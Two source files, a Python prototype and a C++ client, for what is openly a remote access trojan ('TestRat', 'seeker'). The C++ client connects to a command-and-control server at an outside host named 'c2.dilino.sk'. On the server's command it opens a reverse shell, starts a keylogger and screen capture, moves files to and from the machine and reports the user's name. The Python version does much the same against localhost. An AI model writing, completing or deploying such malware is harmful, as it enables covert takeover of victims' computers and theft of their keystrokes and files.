File: argus/prototype/seeker.py
import json
import uuid
import time
import threading
import websocket

import util
import keylogger
import classes
import shell

SERVER_URL = "ws://localhost:8080/ws/seeker"
RECONNECT_DELAY = 5

seconds_disconnected = 0
client_uuid = None
should_reconnect = True
ws_holder = classes.WSHolder()

def on_message(ws, message):
    global should_reconnect
    print(f"[Server] {message}")
    
    try:
        data = json.loads(message)
        msg_type = data.get("type")
        msg_data = data.get("data", "")

        if msg_type == "shell_command":
            if msg_data == "start":
                shell.start_shell(ws)
            elif msg_data == "stop":
                shell.stop_shell(ws)
            else:
                ws.send(json.dumps({"type": "shell_output", "data": f"[Info] Unknown shell_command: {msg_data}"}))

        elif msg_type == "shell_input":
            if shell.shell_running and shell.shell_process and shell.shell_process.stdin:
                with shell.shell_lock:
                    try:
                        shell.shell_process.stdin.write(msg_data + "\n")
                        shell.shell_process.stdin.flush()
                    except Exception as e:
                        ws.send(json.dumps({"type": "shell_output", "data": f"[Error] Failed to write to shell: {e}"}))
            else:
                ws.send(json.dumps({"type": "shell_output", "data": "[Info] Shell not running."}))

        elif msg_type == "Disconnect":
            print(f"[Info] Received server-initiated disconnect: {msg_data}")
            should_reconnect = False
            ws.close()

    except json.JSONDecodeError:
        print("[Error] Failed to decode server message.")


def on_error(ws, error):
    print(f"[WebSocket Error] {error}")


def on_close(ws, close_status_code, close_msg):
    print("[WebSocket] Connection closed.")
    shell.stop_shell(ws)

def on_open(ws):
    global seconds_disconnected, ws_holder
    ws_holder.ws = ws
    seconds_disconnected = 0
    print("[WebSocket] Connected.")

    rat_info = {
        "id": client_uuid,
        "name": "TestRat",
        "os": "Windows",
        "ip": "192.168.1.100",
        "metadata": {"version": "1.0"}
    }

    ws.send(json.dumps(rat_info))

def run_websocket():
    global seconds_disconnected, should_reconnect, ws_holder

    while should_reconnect:
        ws = websocket.WebSocketApp(
            SERVER_URL,
            on_open=on_open,
            on_message=on_message,
            on_error=on_error,
            on_close=on_close
        )

        ws.run_forever()

        if not should_reconnect:
            print("[Info] Server-initiated disconnect received, not reconnecting.")
            break

        seconds_disconnected += RECONNECT_DELAY
        print(f"[Reconnect] Lost connection. Retrying in {RECONNECT_DELAY}s (disconnected for {seconds_disconnected}s)...")
        time.sleep(RECONNECT_DELAY)

def main():
    global client_uuid

    args = util.parse_arguments()
    client_uuid = args.uuid or str(uuid.uuid4())
    print(f"[Info] Using UUID: {client_uuid}")

    #keylogger_thread = threading.Thread(target=keylogger.start, args=(ws_holder,), daemon=True)
    #keylogger_thread.start()

    thread = threading.Thread(target=run_websocket, daemon=True)
    thread.start()

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[Shutdown] Exiting client.")
        if shell.shell_running:
            shell.stop_shell(ws_holder.ws)

if __name__ == "__main__":
    main()

File: seeker/seeker.cpp
#include "./src/websocket_client.hpp"
#include "./src/user_info.hpp"
#include "./src/file_transfer.hpp"
#include "./src/keylogger.hpp"
#include "./src/reverse_shell.hpp"
#include "./src/screenshare.hpp"

#include <nlohmann/json.hpp>
#include <iostream>
#include <string>
#include <map>
#include <chrono>

struct Seeker {
    std::string ID;
    std::string Name;
    std::string OS;
    std::map<std::string, std::string> Metadata;

    nlohmann::json to_json() const {
        nlohmann::json j;
        j["id"] = ID;
        j["name"] = Name;
        j["os"] = OS;
        j["metadata"] = Metadata;
        return j;
    }
};

int main() {
    WebSocketClient client("c2.dilino.sk", 8010, "/ws/seeker");
    KeyLogger keylogger(client);
    Shell shell(client);
    ScreenShare screenshare(client);

    client.setMessageCallback([&client, &keylogger, &shell, &screenshare](const std::string& message, size_t len) {
        std::cout << "[Server] " << message << std::endl;

        try {
            nlohmann::json data = nlohmann::json::parse(message);
            std::string msg_type = data.value("type", "");
            std::string msg_data = data.value("data", "");

            std::cout << msg_type << std::endl;
            if (msg_type == "shell_command") {
                if (msg_data == "start") {
                    shell.startShell();
                }
                else if (msg_data == "stop") {
                    shell.stopShell();
                }
                else {
                    nlohmann::json response;
                    response["type"] = "shell_output";
                    response["data"] = "[Info] Unknown shell_command: " + msg_data;
                    client.sendMessage(response.dump());
                }
            }
            else if (msg_type == "shell_input") {
                shell.writeShellInput(msg_data);
            }
            else if (msg_type == "screenshare_command") {
                if (msg_data == "start") {
                    screenshare.start_screenshare();
                }
                else if (msg_data == "stop") {
                    screenshare.stop_screenshare();
                }
                else {
                    nlohmann::json response;
                    response["type"] = "screenshare_output";
                    response["data"] = "[Info] Unknown screenshare_command: " + msg_data;
                    client.sendMessage(response.dump());
                }
            }
            else if (msg_type == "keylogger_command") {
                if (msg_data == "start") {
                    keylogger.start();
                    nlohmann::json response;
                    response["type"] = "keylogger_output";
                    response["data"] = "[Info] Keylogger started";
                    client.sendMessage(response.dump());
                }
                else if (msg_data == "stop") {
                    keylogger.stop();
                    nlohmann::json response;
                    response["type"] = "keylogger_output";
                    response["data"] = "[Info] Keylogger stopped";
                    client.sendMessage(response.dump());
                }
                else {
                    nlohmann::json response;
                    response["type"] = "keylogger_output";
                    response["data"] = "[Info] Unknown keylogger_command: " + msg_data;
                    client.sendMessage(response.dump());
                }
            }
            else if (msg_type == "file_upload") {
                try {
                    nlohmann::json file_data = nlohmann::json::parse(msg_data);
                    std::string result = file_transfer::save_file(file_data);
                    nlohmann::json response;
                    response["type"] = "file_transfer_output";
                    response["data"] = result;
                    client.sendMessage(response.dump());
                }
                catch (const std::exception& e) {
                    nlohmann::json response;
                    response["type"] = "file_transfer_output";
                    response["data"] = "[Error] Failed to process file upload: " + std::string(e.what());
                    client.sendMessage(response.dump());
                }
            }
            else if (msg_type == "file_download") {
                try {
                    std::string result = file_transfer::send_file(msg_data);
                    nlohmann::json response;
                    response["type"] = "file_download_response";
                    response["data"] = result;
                    client.sendMessage(response.dump());
                }
                catch (const std::exception& e) {
                    nlohmann::json response;
                    response["type"] = "file_transfer_output";
                    response["data"] = "[Error] Failed to process file download: " + std::string(e.what());
                    client.sendMessage(response.dump());
                }
            }
            else if (msg_type == "notification") {
                // TODO: Parse msg_data as JSON to extract notification message and title
                // Display a system notification with the provided message and title
            }
            else if (msg_type == "Disconnect") {
                // TODO: Handle server-initiated disconnect
                // Close the WebSocket connection and prevent reconnection
                std::cout << "[Info] Received server-initiated disconnect: " << msg_data << std::endl;
                client.stop();
            }
            else {
                // TODO: Handle unknown message types
                std::cout << "[Info] Unknown message type: " << msg_type << std::endl;
            }
        }
        catch (const nlohmann::json::exception& e) {
            // TODO: Handle JSON parsing errors
            std::cerr << "[Error] Failed to decode server message: " << e.what() << std::endl;
        }
        });

    client.setEventCallback([&client](enum lws_callback_reasons reason) {
        if (reason == LWS_CALLBACK_CLIENT_ESTABLISHED) {
            std::cout << "Connected to server" << std::endl;

            // Create and populate Seeker struct
            Seeker seeker;
            seeker.ID = user_info::getUUID();
            seeker.Name = user_info::getUsername();
            seeker.OS = "Windows";

            nlohmann::json json = seeker.to_json();
            std::string json_str = json.dump();

            if (!client.sendMessage(json_str)) {
                std::cerr << "Failed to send initial Seeker data" << std::endl;
            }
            else {
                std::cout << "Sent initial Seeker data: " << json_str << std::endl;
            }
        }
        else if (reason == LWS_CALLBACK_CLIENT_CLOSED) {
            std::cout << "Connection closed" << std::endl;
        }
        });

    if (!client.initialize()) {
        std::cerr << "Initialization failed" << std::endl;
        return -1;
    }
    if (!client.connect()) {
        std::cerr << "Connection failed" << std::endl;
        return -1;
    }

    client.run();

    std::cout << "Client stopped" << std::endl;
    return 0;
}